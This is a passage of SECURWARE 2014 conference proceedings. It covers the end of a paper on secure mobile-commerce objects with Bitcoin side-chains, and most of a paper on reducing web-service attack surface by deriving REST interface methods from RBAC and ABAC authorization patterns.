place in the Bitcoin system, since its creation. In order for a
new transaction to be considered valid and accepted in the
system, it must be included in the blockchain and then,
applying mathematically and computationally complex
procedures, be verified. Moreover, all accounts (Bitcoin
addresses) in the Bitcoin system are publicly available,
which means that anyone can check the balance of each
account and how it has accumulated its current balance.
As Bitcoin addresses are long random strings of
characters without any meaning and interpretation, there is
no direct link between the owner of an address and the
address itself. Nonetheless, it is still feasible for someone to
try to find information that may be leaked about identities
and the addresses that belong to them. This feature is also
very useful in order to protect one’s privacy. We would like
to extend this feature by offering both anonymous
transactions and by providing the possibility to have verified
and authorized transactions for authorities and users who
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
need verification of authenticity and reliability of selected
transactions.
Our intention is to create a side-chain to Bitcoin, starting
with one of the m-commerce objects. Side-chain is a separate
blockchain, which is backed by Bitcoins, in the same way
that currencies are backed by gold [14]. Doing so, we will be
able to take advantage of the above-mentioned Bitcoin
characteristics, while in the meantime manipulate the sidechain according to the m-object’s needs.
VII. RELATED WORK
The concept of m-commerce is not new to the research
community. From the early years of mobile device adoption,
both with the use of the first mobile smart phones or with the
use of Personal Digital Assistants (PDA), the importance and
potential growth of m-commerce was foreseen and a number
of research solutions with a focus on security were proposed.
Nambiar et al [15] performed an analysis on payment
transactions security in mobile commerce. As their research
is 10 years old, technologies such as Wireless Application
Protocol (WAP) and Java Micro Edition (J2ME) are not
considered relative for modern development. Nonetheless,
we consider the use of the SIM Application Toolkit still
relevant, although still not used by major vendors, as
demonstrated by our previous work [16]. Hughes [17]
provides a comparison between Business-to-Business (B2B)
and Business-to-Consumer (B2C), pointing out which Public
Key Infrastructure (PKI) components are not necessary for a
B2C marketplace. Lam et al [18] propose a lightweight
security for mobile commerce transactions. Their proposal is
based on public key cryptography and is end-to-end, thus
avoiding any intermediate insecure actors. Chang et al [19]
have proposed a secure e-coupon system for mobile users.
The requirements Chang proposes are similar to ours with
the difference that we extend them by including duplication,
monetary value, multiple use and tracing.
We consider the above research results valuable input for
our further research. However, it has to be pointed out, that
as the works are relatively old, most of the restrictions
mentioned are not applicable any more. For example, the
computational power of the mobile devices, the wireless
connectivity, the ease of use of modern smart phones and the
powerful in terms of capabilities mobile operating systems,
make it possible to overcome many of the restrictions that
were mentioned a few years ago.
The most significant difference with our solution is that
we propose a system that differentiates approach and security
mechanisms depending on the nature of the m-object. The
approach is not universal and applied blindly to all objects.
That is the reason why we have distinguished and created the
different m-object categories.
VIII. DISCUSSION
In this work, we have presented and described our notion
of mobile commerce objects, their use and special
characteristics. We believe that the differentiation that we
propose between these digital representations of goods is a
useful distinction that could be a key enabler for future
mobile commerce systems.
191
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
The most significant challenge we had to face was to
clearly distinguish between the proposed categories of mcommerce objects. In fact, by searching the literature, the
notions and terms used are some times mixed or may have a
double meaning. For example, the difference between
promotions and coupons is very delegate and may create
confusion.
When dealing with a client-to-server connection, even
more when the client is a mobile device, it is reasonable to
face well-known vulnerabilities, specific to such
environment. For example, threats like eavesdropping,
spoofing, Denial of Service (DOS), data manipulation have
to be dealt with when deploying such a system. We consider
the description and further analysis of such threats not in the
scope of this paper; we take however into account the results
from [20] and [21] in order to deal with them in our future
work.
Moreover, in order to avoid some of the human related
vulnerabilities, e.g. having a mobile device stolen, we use
secure storage of the m-objects on the user’s device, as
described in [16] and [22]. In such case, the m-object cannot
be retrieved even in the case where the legitimate owner
loses his/her device.
Finally, with the use of a mobile device as the main
enabler of m-objects, it is evident that connectivity issues
may appear. However, with the wide pervasiveness of
wireless technologies, both mobile communications and WiFi connections, we consider connectivity and speed
connection to be less of a problem and not to influence the
client experience.
Our goal with this article is to provide a reference for
future use of m-commerce objects but to also propose what
security and privacy characteristics are needed for them.
With our distinction, we have made it easier to implement
security enhancements for the m-objects as we provide
guidelines on which requirements are needed. We also point
out how this approach differs from a classical security
solution from both the server and the client side. Our
intention is to use the current paper as a reference for our
further developments as described in the section below.
IX.
CONCLUSIONS AND FUTURE WORKS
In this paper, we have described our concept of mcommerce objects and analyzed security mechanisms that are
required in order to ensure protection and consistency of
their attributes. We have also emphasized security services
that ensure the integrity and authenticity of m-commerce
objects. Those services are provided to all actors in the
system, each having a different motivation and reason for
ensuring the correctness of the objects and transactions.
Moreover, we ensure customers’ privacy by concealing
sensitive information from intermediate parties. Finally, we
refer to the Bitcoin system as a basis of the new paradigm for
use of virtual currencies.
For future work, we plan to use some of the innovative
mechanisms that Bitcoin has introduced for our design and
implementation of the complex security system for the
protection of virtual currencies. Anonymity and traceability
of accounts and transactions are desired features in our
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
design and implementation. However, they will be combined
with the corresponding security enhancements that will allow
legal entities to intervene in case of illegal transactions and
activities.
REFERENCES
[1]
[2]
[3]
[4]
[5]
[6]
[7]
[8]
[9]
[10]
[11]
[12]
[13]
[14]
[15]
[16]
[17]
[18]
[19]
[20]
[21]
B. Siwicki, “E-commerce and m-commerce: The next five years,”
internetretailer.com,
28-Apr-2014.
[Online].
Available:
http://www.internetretailer.com/commentary/2014/04/28/ecommerce-and-m-commerce-next-five-years. [Retrieved: Oct-2014].
I. Kounelis, G. Baldini, S. Muftic, and J. Loschner, “An Architecture
for Secure m-Commerce Applications,” in 2013 19th International
Conference on Control Systems and Computer Science (CSCS),
2013, pp. 519–525.
WordReference,
“Promotion.”
[Online].
Available:
www.wordreference.com/definition/promotion. [Retrieved: Jan2012].
PROMO, “Proximity Marketing Solution.” [Online]. Available:
http://isin.dti.supsi.ch/NetLab/index.php/promo. [Retrieved: Jan2012].
Mobile Marketing Association, “Introduction to Mobile Coupons,”
MMA, 2007.
K. Fujimura and D. Eastlake, “RFC 3506 - Requirements and Design
for Voucher Trading System (VTS),” 2003.
“Groupon.”
[Online].
Available:
http://www.groupon.com/.
[Retrieved: Feb-2013].
Kansas Statutes Annotated, “Unfair Trade And Consumer
Protection: Consumer Protection,” 2006.
G. Me, “Security overview for m-payed virtual ticketing,” in
Personal, Indoor and Mobile Radio Communications, 2003, pp. 844–
848.
US General Services Administration, “Pre-paid Card,” SmartPay.
[Online].
Available:
https://smartpay.gsa.gov/about-gsasmartpay/glossary#p. [Retrieved: Feb-2012].
Electronic Merchant Systems, “Loyalty Card.” [Online]. Available:
http://www.elect-mer.com/glossary-l.html. [Retrieved: Feb-2013].
I. Kounelis, S. Muftic, and J. Loeschner, “Secure and PrivacyEnhanced E-Mail System Based on the Concept of Proxies,”
presented at the 37th International Convention on Information and
Communication Technology, Electronics and Microelectronics MIPRO, 2014, pp 1405-1410.
“Bitcoin - Open source P2P money.” [Online]. Available:
https://bitcoin.org/en/. [Retrieved: May-2014].
Z. Muadh, “Introduction To Sidechains and Blockchain 2.0,” Deep
Dot
Web.
[Online].
Available:
http://www.deepdotweb.com/2014/06/26/sidechains-blockchain-20/. [Retrieved: Oct-2014].
S. Nambiar, C.-T. Lu, and L. R. Liang, “Analysis of payment
transaction security in mobile commerce,” in Proceedings of the
2004 IEEE International Conference on Information Reuse and
Integration, 2004. IRI 2004, 2004, pp. 475–480.
I. Kounelis, H. Zhao, and S. Muftic, “Secure Middleware for Mobile
Phones and UICC Applications,” in Mobile Wireless Middleware,
Operating Systems, and Applications, vol. 93, Berlin, Heidelberg:
Springer Berlin Heidelberg, 2012, pp. 143–152.
J. Hughes, “Enabling E-Commerce Through PKI,” Netw. Secur.,
vol. 2000, no. 3, Mar. 2000, pp. 14–16.
K.-Y. Lam, S.-L. Chung, M. Gu, and J.-G. Sun, “Lightweight
security for mobile commerce transactions,” Comput. Commun.,
vol. 26, no. 18, Dec. 2003, pp. 2052–2060.
C. C. Chang, C. C. Wu, and I. C. Lin, “A Secure E-coupon System
for Mobile Users,” Jan. 2006.
D. Geneiatakis, I. Kounelis, J. Loeschner, I. N. Fovino, and P.
Stirparo, “Security and Privacy in Mobile Cloud Under a Citizen’s
Perspective,” in Cyber Security and Privacy, M. Felici, Ed. Springer
Berlin Heidelberg, 2013, pp. 16–27.
I. Kounelis, J. Loschner, D. Shaw, and S. Scheer, “Security of
service requests for cloud based m-commerce,” in 2012 Proceedings
of the 35th International Convention MIPRO, 2012, pp. 1479 –1483.
192
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
[22] F. Zhang, I. Kounelis, and S. Muftic, “Generic, Secure and Modular
(GSM) Methodology for Design and Implementation of Secure
Mobile Applications,” presented at the SECURWARE 2012 , The
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Sixth International Conference on Emerging Security Information,
Systems and Technologies, 2012, pp. 1–6.
193
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Attack Surface Reduction for Web Services based on Authorization Patterns
Roland Steinegger, Johannes Schäfer, Max Vogler, and Sebastian Abeck
Research Group Cooperation & Management (C&M)
Karlsruhe Institute of Technology (KIT)
Karlsruhe, Germany
{ abeck, steinegger }@kit.edu, { johannes.schaefer, max.vogler }@student.kit.edu
Abstract—During the design of a security architecture for a
web application, the usage of security patterns can assist with
fulfilling quality attributes, such as increasing reusability or
safety. The attack surface is a common indicator for the safety
of a web application, thus, reducing it is a problem during
design. Today’s methods for attack surface reduction are not
connected to security patterns and have an unknown impact on
quality attributes, e.g., come with an undesirable trade-off in
functionality. This paper introduces a systematic and
deterministic method to reduce the attack surface of web
services by deriving service interface methods from
authorization patterns. We applied the method to the
Participation Service that is part of the KIT Smart Campus
system. The resulting RESTful web services of the application
are presented and validated.
Keywords-security pattern, attack surface, authorization, web
service, rest
I.
INTRODUCTION
Every web application has assets needing protection from
threats, e.g., web services. Thus, securing web applications is
a major issue. Security must be considered during the whole
software development life cycle to build secure software [1].
In such a security-based software development life cycle,
security patterns are used during the design phase to solve
common security problems and build a security architecture
[2].
Security patterns in the security architecture can have an
impact on non-security quality attributes of the whole
software system, such as loose coupling or discoverability
[2]. When using security patterns, it is helpful to know this
influence on the quality of the application [3]. Additional,
security should be applied as early as possible to increase
overall security [3]. Developers are generally not security
experts and a systematical approach can help them reaching
quality requirements [4]. Regarding a concrete quality
attribute, the attack surface, several metrics have been
introduced to measure the attack surface of whole software
systems [5], object oriented designs [3][6] and web
applications [7].
In addition to metrics, there are methods to reduce the
attack surface, e.g., by using the Top 10 most critical
applications security flaws of the Open Web Application
Security Project (OWASP) [8], by removing or disabling less
important or unnecessary functionality [9][10] or by
reducing the permissions of the application [11]. These
methods do not offer the possibility to systematically reduce
the attack surface and they do not describe their influence on
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
other quality attributes. Additionally, there is no connection
to security patterns that are commonly used in a securitybased development process.
Thus, we propose a method based on security patterns for
authorization to reduce the attack surface of web services.
The method has direct impact on the service interface. It
mainly focuses on web services having a manageable
amount of authorization rules that do not change
periodically. It reduces the attack surface, by reducing the
privileges for methods on the interface to the minimum
needed, according to authorization. Furthermore, the client
can choose under which privilege a service interface method
should be called. Both increase the security by following the
principle of least privilege and secure interaction design [12].
Our approach additionally leads to service interfaces, which
are compliant with the Representational State Transfer
(REST) paradigm [13].
The method is applied on the Participation Service of the
KIT Smart Campus system. The service uses an AttributeBased Access Control (ABAC) for authorization due to
complex security requirements. The resulting web services
of the Participation Service are introduced. The web services
are analyzed using the attack surface metric of [7].
The article is structured as follows: Firstly, the needed
background and related work are introduced in Section II.
The approach is presented in Section III for two commonly
used authorization patterns. The next Section IV shows the
evaluation of the approach by applying it on the Participation
Service. After the evaluation Section V discusses limitations
of the approach. The paper gives conclusions and an outlook
on future work in the last Section VI.
II.
BACKGROUND AND RELATED WORK
In this section, the needed background for our approach
is presented. This includes the software system used for
evaluating the approach, the Participation Service, security
patterns used for our approach, and related work on the
attack surface, as well as on REST and its constraints.
A. Participation Service of the KIT Smart Campus
The KIT Smart Campus (KIT-SC) system is a web
application developed at the Karlsruhe Institute of
Technology (KIT). A detailed description of the KIT-SC and
its features is given in [14]. The KIT-SC pursues the goal to
support students and employees at learning, teaching and
other activities related to the KIT campus.
The Participation Service represents a part of the KITSC. It provides a forum with voting and discussion features.
194
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Following the principles of systemic consensus, this enables
groups of users to make decisions on campus-related issues
by using the modern, responsive web application.
B. Security patterns for authorization
With our approach, service interfaces are derived from
authorization patterns. The steps are shown for two common
security patterns: Role-Based Access Control (RBAC) and
ABAC.
RBAC takes advantage of the fact, that organizations are
often structured in roles, e.g., students, employees and
administration [2]. These roles have certain rights and duties.
The rights of these roles can be used to model the access
rights in the system. Thus, subjects get all rights through
their roles. In this way, the process of assigning access rights
is simplified by the usage of global roles instead of
individual rights [2].
The structure of RBAC shows Figure 1. Subjects have
certain roles and these roles are directly connected with
resources. The concrete right is associated to the connection
between role and resource. As soon as roles are not
applicable or a more flexible access control is required,
RBAC has strong limitations [15].
ABAC is a more flexible approach because of the usage
of attributes as information source for access control [15]. In
addition to static roles, which can still be realized with
ABAC, access control can be defined for dynamic attribute
combinations of subjects, resources and environments [15].
This structure shows Figure 2. Subjects are directly
connected to resources. The right is associated to this
connection and uses the attributes.
Yuan et al.'s formal definition [15] is: S, R and E are
subjects, resources and environments with pre-defined
attribute sets SAn, RAn and EAn. A policy rule that decides
on whether a subject s can access a resource r in an
environment e is a Boolean function of s, r and e's attributes:
canAccess(s, r, e) ← f(ATTR(s), ATTR(r), ATTR(e))
where ATTR() is a function that assigns every currently
valid attribute to a subject, resource or environment.
Authorization using ABAC is, thus, more fine-grained
than RBAC. But as negative aspect, it is more complex to
implement.
C. Attack Surface
With our approach, we connect security patterns with
software product quality according to ISO/IEC 25010 [16].
These are on the one hand the quality attribute attack surface
and on the other hand quality attributes connected to the
REST paradigm. In this section, we introduce the attack
Subj ect
has
Role
isAuthorizedFor
Resource
Right
Figure 2. Scheme of the Roled-Based Access Control based on [17]
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Subj ect
isAuthorizedFor
Attribute
Resource
Env ironment
Attribute
Attribute
«use»
«use»
«use»
Right
Figure 1. Scheme of the Attribute-Based Access Control based on
[17]
surface.
Developers wish to anticipate the vulnerability of their
software system prior to deployment. The popular concept of
loose coupling and the distribution of systems or web
applications lead to an increasing number of interfaces [18].
These are natural security boundaries that augment the attack
surface, an indicator for measuring a system’s vulnerability
towards external attacks [7][9].
The attack surface does not give information on code
quality or high-value architectural design. And neither does a
large attack surface imply that a system has much
vulnerability, nor does a small attack surface mean little
vulnerability. But a large attack surface indicates that an
attacker presumably needs less effort for exploiting
vulnerabilities [5]. The reduction of the attack surface,
therefore, reduces the overall security risk – a product of the
probability, the consequences of occurrence of a hazardous
event and the asset value: Risk = Threat × Vulnerability ×
Asset Value [19]. Think of two web applications with similar
functionality and value – the one with a higher attack surface
is more likely to be chosen to attack amongst these
opportunities.
We use the attack surface metric for web applications [7]
to evaluate our approach. The metric is based on parameters
grouped into parameter families. These parameter families
are Degree of Distribution, Dynamic Creation, Security
Features, Input Vectors, Active Content, Cookies and Access
Control. Parameters are, e.g., Role and Privileges for the
parameter family Access Control. For each of the parameters
a value is assigned, depending on the application. The higher
the value, the greater is the attack surface and the higher is
the risk for attacks, e.g., accessing the application as
unauthenticated user has value 0, whereas accessing as
authenticated or root user have value 5 and 10. The metric is
calculated by calculating the Euclidian norm for each value
of a parameter family. The value of the parameter family is
the Euclidian norm calculated for each value of parameter in
the family. The maximum attack surface is 60.79.
In the next sections, we discuss methods for reducing the
attack surface regarding our goals and service interface
design. The author of [9] suggests several methods for
reducing the attack surface of an operating system. His 80/20
rule (according to the Pareto principle) to reduce the amount
of running code contradicts our goal to not reduce
functionality. Further, he offers no systematical way to find
195
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
code to remove. The methods for applying least privileges
and reducing access for untrusted users mainly focus on the
system running the application. According to this method,
we suggest that for service interfaces least privileges also
means reducing the amount of accessible operations.
Authorization defines who shall access operations and is,
therefore, our starting point for securing access by reducing
the attack surface.
Reference [10] introduces an approach for removing or
disabling unused code in operating systems. This
corresponds to finding the 20 percent in the 80/20 rule of [9]
and therefore, it aims to reduce functionality. Their general
approach consists of two phases, the analysis and
enforcement phase. In the analysis phase, unused code is
found. The enforcement phase aims to avoid execution of
unused code. They identify unused code by running the
application and executing all available methods. Thus, this
approach needs a running application and is firstly applicable
in the implementation phase. We think that seldom-used or
unused code could be avoided by considering security
earlier.
Methods for reducing the attack surface of a web
application based on the Top 10 vulnerabilities published by
the OWASP are introduced by [8]. The authors use security
measures mitigating these vulnerabilities. The Top 10 entries
are related to security vulnerabilities in web applications and
therefore, they do not have to be connected to the attack
surface. Thus, not all of the applied measures, such as input
validation and secret tokens, affect the attack surface
directly. A systematical way to reduce the attack surface
needs to ensure this reduction.
The discussed approaches aim to reduce the attack
surface of in several ways. They do not offer a systematical
way with concrete transformations to reduce the attack
surface. Often the functionality of the application is reduced
to ensure a smaller attack surface. Using security patterns is
not part of any of these approaches. We tackle these
limitations with our approach.
D. Web Services based on REST
According to the W3C, the term web service refers to a
software system designed to support interoperable machineto-machine interaction over a network [21][20]. It is
frequently regarded more as a system’s function of providing
web access to its inner purpose rather than the whole system
itself. Furthermore, a web application consists of web
services, e.g., the web browser uses web services.
The W3C distinguishes two types of web services: Those
using REST-compliant interfaces and those providing
arbitrary access [20]. While the latter have been primarily
used in the past – presumably because of the ease of
implementation – RESTful interfaces become increasingly
popular, mainly for their lightweight and universal
deployment [21].
REST is an architectural style for the communication of
web services proposed by Fielding [13]. It relies on existing
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
standards, such as the Hypertext Transfer Protocol (HTTP),
and defines six constraints for RESTful interfaces rather than
concrete implementation specifications: The Client-Server
principle, the concept statelessness, the usage of a cache, the
uniformity of the interface, the layered system and the
optional Code-On-Demand feature [13].
The uniform interface is the centerpiece of the REST
architectural style: The interface describes every aspect
trough resources. Every resource is identified by a unique
address, which is in most cases a URI. Those resources are
retrieved or manipulated via representations. A set of valid
operations on these representations is available. Requests and
responses are self-descriptive and semantic and hypermedia
is used to describe them [13]. Hereby, a high degree of
universality is achieved. However, it comes with a
compromise in efficiency since the standardized information
transfer leads to an overhead [21].
Since our approach alters the operations allowed on the
resources, the compliance of the new interface to the
uniformity concept is focus of validation.
III.
DERIVING SERVICE INTERFACE METHODS FROM
AUTHORIZATION PATTERNS
In this section, we introduce our method to reduce the
attack surface. We developed the approach based on the
following assumptions and formulated goals 1 to 6. First,
current methods for attack surface reduction have
inacceptable deficits, such as decreasing functionality (goal 1
and 4). Second, non-security experts can apply the method
and ensure security [4] (goal 2). Third, the method must be
applicable at an early stage [3] (goal 3) on the KIT Smart
Campus (goal 5, 6).
1.
2.
3.
4.
5.
6.
Security patterns shall be connected to software
product quality not related to security.
A systematic way shall ensure certain quality
attributes, including the attack surface.
The method shall be applicable in an early software
development phase.
The method shall not reduce application
functionality.
The method shall be applicable on web applications.
It shall apply for web services similar to the
RESTful web services of the Participation Service.
Before introducing the method, we align the term attack
surface according to ISO/IEC 25000 and 25010. The attack
surface is an inherent characteristic of software, because it
can be measured with several metrics introduced. Thus,
speaking in the language of ISO/IEC 25000 [22], it is a
software quality attribute. We suggest to assign it to the
quality characteristic freedom from risk and its sub
characteristic economic risk mitigation according to ISO/IEC
25010 [16]. Therefore, it belongs to the quality in use model.
196
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Concerning the method, the starting point is the
authorization of the application and corresponding security
patterns. These patterns describe who can access resources
in which way. Thus, authorization can be used to reduce the
attack surface to exactly the functionality that shall be
offered. Regarding the metric for web applications
introduced in [7], our approach reduces the parameter family
of access control. Other parameter families are not
influenced by the approach and, thus, a reduction is ensured.
Our approach consists of the following three steps:
1.
2.
3.
Set up an access control matrix.
Derive services from the access control matrix.
Create REST-compliant web services based on the
derived services.
The access matrix of the first step contains resources and
operations as columns and policy rules as rows. For every
operation allowed by a policy rule, the corresponding table
cell is filled with a dot. See Table 1, Table 2 and Table 3 as
examples. In the second step, a web service is introduced for
each resource. Its service interface has an operation for every
table cell having at least one marked row. Figure 3 is an
example for this. In the last step, the resulting web services
are mapped to a REST-compliant web service. Each step is
introduced in the next sections. First, the main idea of
deriving technology independent web services and its service
interfaces is explained in depth. Second, the mapping from
the abstract web service to a REST-compliant web service.
A. Deriving Abstract Service Interfaces from Role-Based
Access Control
A role-based scheme for the access control with n
different resources and m roles can be depicted as a twodimensional matrix (see example on Table 1). With the
REST paradigm’s resource-oriented interface style kept in
mind, we assume that four operations are possible per
resource: Creating, retrieving, updating and deleting
(CRUD). A bullet indicates that the specified role is allowed
to use the specified operation on the specified resource.
While in an ordinary RESTful implementation the
interface would have provided access for all roles on all
operations and all resources, our approach aims to reduce the
overall number of accessible operations to a minimum. In the
TABLE I.
EXEMPLARY MATRIX FOR RBAC WITH ROLES
Resource #1
Resource #2
C
Role #1
Role #2
Role #3
●
R
●
●
●
U
D
C
●
●
●
●
●
R
●
●
●
U
D
●
●
TABLE II.
EXEMPLARY MATRIX FOR ABAC WITH EXPRESSIONS
Resource #1
Resource #2
canAccess(s, r, e)
C R U D C R U D
attribute1(r)
●
●
!attribute2(r)
● ●
● ●
●
attribute2(r) ∧ attribute3(r)
● ● ●
● ● ● ●
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Resource1Serv ice
+
+
+
+
+
+
createAsAttribute2AndAttribute3(): Response
readAsAttribute1(): Response
readAsAttribute2AndAttribute3(): Response
readAsNotAttribute2(): Response
updateAsAttribute2AndAttribute3(): Response
updateAsNotAttribute2(): Response
Figure 3. Entity Service for Resource #1 of Table 2
context of Table 1, this would lead to a reduction of the
attack surface by the number of unfilled table cells.
This is achieved by the creation of additional methods:
Usually, one method is implemented for each operation on a
resource. But by using our approach, methods are not only
generated per operation but per operation and role
(GetAsRole1, GetAsRole2, GetAsRole3, PostAsRole1, etc.).
The difference is that each method can only validly be used
by exactly one role and not by all roles possible. So far, the
attack surface stays the same. The reduction is then reached
by not implementing those methods that do not have a bullet
in the access control matrix of, e.g., Table 1.
B. Deriving Abstract Service Interfaces from AttributeBased Access Control
Applying the approach to ABAC extends the principles
of the application to RBAC.
In the first step, all applicable operations for each
resource of R are listed as columns in the access control
matrix. Every policy rule of the canAccess() functions is
listed as row. Every cell for which a canAccess() function is
true is marked. A possible result shows Table 2.
Deriving the interface from Table 2 works similarly to
the role-based approach: A service interface is created for
each resource. In every service, operations are created for all
allowed operation. Example operations from Table 2 are
readIfIsAttribute1,
updateIfIsNotAttribute2
and
deleteIfIsAttribute2AndAttribute3 (see Figure 3). To prevent
long and complicated method names, it is best practice to
derive canAccess() rules from single attributes only
whenever possible.
C. Application on Authorization Patterns
Sections III.A and III.B show how service interface
methods can be derived for ABAC and RBAC. This section
shows that the method is applicable for any kind of
authorization.
In the sections on RBAC and ABAC, there are two
limitations. First, the service interface methods are derived
from access control matrixes for RBAC and ABAC. Second,
because of the scenario and REST compliance, we used
entity services [23] using only basic CRUD-operations. Both
limitations are not necessary and can be generalized.
Concerning the first limitation, the abstract security
pattern Authorization defines who may access protected
resources in which way [2]. The access control matrix
contains the description of the entity (who) on the first
column of a row, the resource to access (what) on top of the
197
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
column and how the resource shall be accessible below the
resource. Therefore, an access control matrix, as used it
before, can be created for every kind of authorization.
Deriving the abstract service interfaces from these access
control matrixes can be achieved as previously shown.
Create a service interface for each service with operations
combined to the permission. The name of the operations can
be of any kind, thus not only CRUD-operations are
applicable.
D. Maintaining REST Compliance
In order to comply with the previously presented REST
constraints, we propose to not realize the derived service
interface methods with extended HTTP-operations. Quite the
contrary: REST relies on a defined and pre-known set of
operations – namely GET, POST, PUT, DELETE, etc. when
using HTTP. Introducing new operations restricts the API
usage to insiders, thus, adversely affects the interface’s
uniformity and universality. It is also hardly possible in
practice when using HTTP, since custom methods are not
supported by browsers or most clients [21].
It is furthermore not advisable to realize the derived
methods by using custom HTTP headers. To send a “X-Role:
Administrator” header with every request seems practical on
the first sight. But whitelist-based firewalls and proxy
servers will skip those custom headers [24] limiting the API
usage to clients that don’t rely on a firewall. This kind of
limitation is not acceptable.
However, a third way exists: We propose adding the
service operation name to the request URI. Illustrating HTTP
requests using the examples from above could then look like
this:
POST /resource1/?authorization=createAsRole3
DELETE /resource2/?authorization=deleteAsRole3
…
GET /resource1/?authorization=readIfIsAttribute1
PUT /resource1/?authorization=updateIfNotAttribute2
…
This is legal in the HTTP standard and does not violate
the interface uniformity constraint of REST compliance. The
server extracts the information from the parameter – a task
possible with every framework and scripting language.
Diligence is required in the implementation: The parameter
must not have a fallback for an invalid or missing value. If
that is the case, an error has to be thrown. Otherwise, the
attack surface is not reduced for the simple reason that it
TABLE III.
ACCESS CONTROL MATRIX OF USER AND GROUP
RESOURCES OF THE PARTICIPATION SERVICE
User
Group
canAccess(s, r, e)
Guest(s)
Authenticated(s)
User(s) = r
User(s) = Owner(r)
Admin (s)
Copyright (c) IARIA, 2014.
C
●
R
U
●
D
C
R
●
●
U
●
●
●
●
ISBN: 978-1-61208-376-6
●
●
D
UserServ ice
+
+
+
+
+
GroupServ ice
createIfIsGuest(): String
readIfIsAdmin(): String
readIfIsAuthenticated(): String
updateIfIsAdmin(): String
updateIfUserIsResource(): String
+
+
+
+
+
createIfIsLAuthenticated(): String
readIfIsAdmin(): String
readIfIsAuthenticated(): String
updateIfIsAdmin(): String
updateIfUserIsOwner(): String
Figure 4. User and Group Service derived from access control matrix
shown in table 3
does not differ from the traditional implementation.
An appropriate error communication for that case and for
the case of using a not allowed permission on the specific
resource, is responding with HTTP’s status 405 Method Not
Allowed. At first sight it seems uncommon to respond with a
method-related error code to a missing or falsely specified
parameter. However, as the parameter is merely an extension
of the method according to the approach of this paper, it is
suitable here. The list of “allowed methods” (more precisely:
method and value for the authorization parameter) can be
supplied in the body of the HTTP response. As a result it is
possible to follow the Hypertext-As-The-Engine-OfApplication-State (HATEOAS) paradigm.
IV.
EVALUATION
In this section, we apply the method on the Participation
Service of the KIT-SC system, show the resulting web
services and give an evaluation. The Participation Service is
developed by seven students during a practical course at the
KIT. The group was divided into two teams, one focusing on
the HTML 5 frontend and the other focusing on the Java
backend.
At the beginning the requirements for the service were
collected. All required subjects S, resources R, environments
E and their attributes SAn, RAn and EAn were identified and
the access control matrix was built. Possible subjects are
anonymous users and authenticated users. This publication
demonstrates the method on the User and Group resources
only, leaving out all other resources of the Participation
Service for the sake of shortness.
According to the requirements, both, users and groups,
can be created, edited and displayed. Deletion is solved by
setting a status flag to deactivated, thus, by updating the
resource. The access control matrix in Table 3 shows the
authorization rules based on ABAC. Users can be created by
guests. An authenticated user can read user account data,
create groups and read them. The owner of an user or group
account can update its information. User with the admin flag
are allowed to read and update users and groups.
Figure 4 shows the derived abstract service interfaces
from the access control matrix of Table 3. For each resource
a service is modeled with the operations according to the
access control matrix. This implies, that the services do not
have operations for deleting the resources, because no
authorization rule exists for this operation. Typically the
delete operation would still be implemented, but inaccessible
due to the enforced authorization. According to [9], this
mapping is a reduction of the attack surface.
198
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
The abstract service interfaces are then mapped to the
REST services with URLs as follows:
For the User Service:
POST /user/?authorization=createIfIsGuest
GET /user/?authorization=readIfIsAdmin
GET /user/?authorization=readIfIsAuthenticated
PUT /user/?authorization=updateIfIsAdmin
PUT /user/?authorization=updateIfUserIsResource
For the Group Service:
POST /group/?authorization=createIfIsAuthenticated
GET /group/?authorization=readIfIsAdmin
GET /group/?authorization=readIfIsAuthenticated
PUT /group/?authorization=readIfIsAdmin
PUT /group/?authorization=readIfUserIsOwner
The Spring Security project was chosen to enforce the
authentication and authorization of the KIT-SC.
Authorization is implemented by adding the annotation
PreAuthorize to each entry point of the corresponding URL.
These annotations contain the access policies as Spring EL
expressions, which are evaluated by Spring Security to
enforce access control. Spring EL offers the possibility to
state expressions on the attributes of resource and subject.
Thus, the patterns delivered in the request, formerly
introduced by our method, can be used to formulate the
Spring EL statement.
Using the approach of this paper in combination with
Spring Security proved to be a good choice for many
reasons:
The attack surface metric of [7] has been improved. The
access control parameter rights of the parameter family
access control has been reduced from 10 to 0 or 5,
depending on the privileges of the operation.
Moreover, enforcing the authorization is easier, because
testing functionality and access decision can be combined.
For example look at the third row of Table 3. The user shall
only be able to update its account. This constraint can be
implemented and tested quite easily. Further, for
enforcement of this policy, just the ownership has to be
validated. This is quite easy, because the user data is
delivered in the request. Without this limitation, the
information must be collected separately. Thus, with a
generic update operation, for each user touched by an
operation call, every policy has to be enforced and
corresponding data has to be fetched.
Additionally, frontend developers benefited from
associating the authorization to HTML forms, buttons and
links. By choosing which operation to call, they get
sensitized to security. Following the principles of secure
interaction design [12], they added confirmation messages,
warnings, colors and icons to the user interface according to
the security level of the different operations used.
V.
LIMITATIONS
Regarding goal 6, the method is based on at least three
assumptions. First, the authorization may be exposed to the
users of the web service and, thus, also to attackers. This
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
may be a threat for the web service or even a problem
regarding federation. We assume, that the system is secure,
even if the attackers have this information, according to
Kerckhoffs's principle for crypto-systems [27]. Thus, this
information may be exposed without making the web service
insecure. Despite this, exposing the information can be
impossible. In this case, the web service operation name has
to be obfuscated or the introduced method cannot be applied.
Second assumption is, that the count of authorization
rules for a single web service does not exceed. The policies
defined by ABAC can be fine-grained using complex
expressions. All these fine-grained policies lead through our
approach to at least one service interface operation. In large
systems this may be a great overhead. Many operations with
potentially long names could be introduced. For example
operations with similar functionality need an agnostic
internal method to avoid redundancy and more methods and
tests have to be implemented by the developers.
Third assumption raised by goal 6 is, that the
authorization rules do not change periodically or often. A
